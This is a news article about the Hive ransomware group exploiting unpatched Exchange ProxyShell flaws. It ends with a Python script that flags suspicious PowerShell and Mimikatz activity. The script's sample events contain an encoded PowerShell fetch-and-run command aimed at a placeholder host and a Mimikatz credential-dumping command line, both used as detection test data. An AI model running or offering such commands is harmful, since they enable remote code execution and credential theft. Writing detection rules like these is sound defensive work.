As part of coordinated attacks, the Hive threat group has targeted organizations across the finance, energy, and healthcare sectors.
During the attacks, the group exploits the ProxyShell vulnerabilities in Microsoft Exchange servers to remotely execute arbitrary commands and then encrypt company data with its own Hive ransomware strain.
The group is well organized: the research team recently discovered that a threat actor managed to enter an organization's environment and encrypt the target data with the ransomware payload in less than 72 hours.
These attacks are particularly damaging because unpatched Exchange servers can be found publicly with web crawlers. Anyone with an unpatched Exchange server is at risk, said Gartner analyst Peter Firstbrook.
Even organizations that have migrated to the cloud version of Exchange often still have some Exchange servers that could be exploited if unpatched. Threats are already circulating and unpatched servers can be identified with a web crawler, so it is extremely likely that unpatched servers will be exploited, said Firstbrook.
What level of risk does ProxyShell have?
Despite the impact of these vulnerabilities, many organizations have failed to patch their on-premises Exchange servers (the vulnerabilities do not affect Exchange Online or Office 365).
Last year, 30,000 Exchange Servers were unpatched, and recent attacks reveal that many organizations have been slow to update their systems.
This is particularly problematic given that the vulnerabilities enable an attacker to remotely execute arbitrary commands and malicious code on the Microsoft Exchange server via port 443.
"Attackers continue to exploit the ProxyShell vulnerabilities that were initially disclosed more than eight months ago. They have been a reliable resource for attackers since their disclosure, despite patches being available," said a senior research engineer at Tenable.
The latest attacks by an affiliate of the Hive ransomware group have been aided by Microsoft Exchange's ubiquity and the apparent delay in patching these months-old vulnerabilities. Organizations around the world in varied industries use Microsoft Exchange for critical business functions, making it an ideal target for threat actors.
Tills claims that organizations that fail to patch their Exchange servers permit attackers to reduce the amount of reconnaissance and the immediate steps they must take to infiltrate target systems.
Detecting ProxyShell intrusions
Organizations that are slow to patch, such as smaller, unseasoned or understaffed IT organizations, may fall into the trap of thinking that, just because there are no obvious signs of intrusion, no one has used ProxyShell to gain a foothold in the environment. This isn't always the case.
"Ransomware attacks will be obvious to organizations when they happen, but there are a number of other attack techniques that will [be] much stealthier, therefore the absence of ransomware does not mean the Exchange server isn't already compromised," according to Firstbrook.
For this reason, Brian Donohue, the principal Information Security Specialist at Managed Detection and Response (MDR), advises that organizations ensure they can detect the execution of Cobalt Strike or Mimikatz, even if they can't update Exchange.
Having a wide defense in depth against a wide range of threats means that even if you cannot patch your Exchange servers or the opponent is using entirely new tradecraft in certain sections of the attack, you might still catch the Mimikatz activity, or you might have an alert that looks for the heavily obfuscated PowerShell that is being used by Cobalt Strike, all of which happens before everything gets encrypted, Donohue said.
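The detection layer Donohue describes, as an added example that is not from the article or any vendor named in it: a small scorer run over constructed process-creation events (parent image plus command line) that flags Mimikatz command patterns, stager-style obfuscated PowerShell (decoding -EncodedCommand first) and a web worker process spawning PowerShell. The sample events, the thresholds and the pattern lists are assumptions for illustration, not real telemetry or a production rule set.

```python
"""Score constructed process-creation events for the post-exploitation
activity the article names: obfuscated PowerShell and Mimikatz."""
import base64
import math
import re
from collections import Counter

# Constructed sample events (not real telemetry): (parent image, command line).
SAMPLE_EVENTS = [
    ("w3wp.exe", "powershell.exe -nop -w hidden -enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
        .encode("utf-16le")).decode()),
    ("cmd.exe", "powershell.exe -c \"Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'\""),
    ("explorer.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
]

# Illustrative patterns; a real rule set would be broader and tuned to the environment.
MIMIKATZ = re.compile(r"sekurlsa::|lsadump::|privilege::debug|invoke-mimikatz", re.I)
OBFUSCATION = re.compile(
    r"-e(nc|ncodedcommand)?\b|frombase64string|-nop\b|-w(indowstyle)?\s+hidden|\biex\b", re.I)
WEB_WORKERS = {"w3wp.exe"}  # IIS worker process that hosts Exchange's web endpoints

def shannon_entropy(s):
    """Bits per character; long base64 blobs push this well above plain text."""
    counts, n = Counter(s), len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return ""

def score_event(parent, cmdline):
    """Return the list of reasons an event is suspicious; empty means nothing matched."""
    reasons = []
    text = cmdline + " " + decode_encoded_command(cmdline)  # inspect decoded payload too
    if parent.lower() in WEB_WORKERS and "powershell" in cmdline.lower():
        reasons.append("web worker spawned PowerShell")
    if MIMIKATZ.search(text):
        reasons.append("Mimikatz command pattern")
    flags = {m.group(0).lower() for m in OBFUSCATION.finditer(text)}
    if len(flags) >= 2:  # one flag alone is common in admin scripts
        reasons.append("obfuscated/stager-style PowerShell: " + ", ".join(sorted(flags)))
    if shannon_entropy(cmdline) > 4.8:
        reasons.append("high command-line entropy")
    return reasons

if __name__ == "__main__":
    for parent, cmdline in SAMPLE_EVENTS:
        print(parent, "->", score_event(parent, cmdline) or "clean")
```

The first event shows why decoding matters: the download cradle is only visible after the -enc payload is decoded, while the third, a routine scheduled script, scores clean.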
Businesses that haven't patched the vulnerabilities can still protect themselves by using Managed Detection and Response and other security solutions to detect the malicious activity that precedes ransomware encryption, so they can respond before it's too late.